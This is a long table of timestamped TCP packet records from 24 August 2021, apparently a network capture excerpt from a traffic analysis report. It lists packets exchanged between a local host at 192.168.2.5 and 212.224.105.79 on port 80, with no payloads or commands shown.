Aug 24, 2021 08:49:20.172770977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172775030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172779083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172791004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172831059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172835112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.173577070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.175662994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.175687075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.175717115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.175734997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.175753117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.175765991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.175837040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.175849915 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180125952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180152893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180166006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180179119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180197954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180210114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180222988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180233955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180246115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180258989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180269957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180272102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180284023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180299044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180311918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180322886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180418015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180425882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180640936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180676937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180694103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180701017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180706024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180725098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180737972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180749893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180767059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180783033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180799007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180805922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180809021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180815935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180831909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180850029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180862904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180867910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180871010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180890083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180907011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180922985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.180954933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.180958033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.181046009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.181112051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.181449890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.181515932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.181576014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.181710005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.181886911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.181967974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.182096004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.182199001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.182218075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.182327032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.182370901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.182432890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.182776928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.182837963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.182895899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183021069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183239937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.183440924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183563948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183614969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.183665037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183809042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183921099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.183960915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183976889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.183995008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184010029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184022903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.184026957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184040070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184060097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184070110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184078932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184092999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184104919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184113026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.184114933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.184122086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184139967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184155941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184168100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.184171915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.184217930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.184220076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187012911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187037945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187053919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187069893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187087059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187103987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187148094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187153101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187154055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187171936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187187910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187206984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187225103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187237024 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187238932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187242031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187287092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187304020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187355042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187371969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187374115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187376976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187414885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187432051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187468052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187470913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187484980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187503099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187544107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187556028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187568903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187613010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187658072 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187671900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187690020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187705994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187736988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187741041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187741041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187758923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187767982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187776089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187794924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187849998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187851906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187851906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187869072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187906027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187923908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.187967062 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187973976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.187994003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188011885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188028097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188045979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188065052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188080072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188096046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188102961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188107014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188386917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188405991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188421965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188436985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188448906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188452005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188457012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188483000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188498020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188514948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188530922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188546896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188549995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188553095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188566923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188585043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188600063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188616037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188632011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.188638926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188642025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188698053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.188702106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.191272974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.191380978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.191437960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.191621065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192194939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192215919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192233086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192250013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192267895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192286968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192303896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192305088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.192310095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.192320108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192337990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192353964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192369938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192384958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192398071 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.192399979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192400932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.192446947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192465067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.192522049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.192528009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.194705009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194773912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194792032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194808006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194823980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194839001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194856882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194870949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194881916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194889069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.194895983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194902897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.194926023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194938898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194955111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194971085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.194978952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.194983006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195317030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195355892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195374012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195400000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195415020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195449114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195466042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195482016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195497036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195498943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195504904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195514917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195542097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195550919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195554972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195560932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195576906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195597887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195616007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195622921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195626020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195632935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195650101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195666075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195683002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195699930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195713043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195719004 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195723057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195743084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195761919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195775032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195777893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195780039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195792913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195811033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195830107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195847988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195856094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195859909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195864916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195880890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195899010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195914984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195931911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195947886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.195971966 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.195976019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.196727991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.199565887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199593067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199611902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199628115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199644089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199675083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199690104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199707985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.199733019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.199779034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.199784040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.203855991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.203886986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.203901052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.203915119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.203932047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.203949928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.204015017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.204071999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205048084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205074072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205091953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205107927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205137014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205164909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205167055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205210924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205230951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205265999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205276012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205280066 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205293894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205328941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205346107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205362082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205382109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205399990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205415964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205418110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205423117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205432892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205450058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205465078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205482006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205497026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205517054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205533981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205534935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205538034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205549955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205564976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205580950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205590010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205595016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205596924 CEST	80	49712	212.224.105.79	192.168.2.5
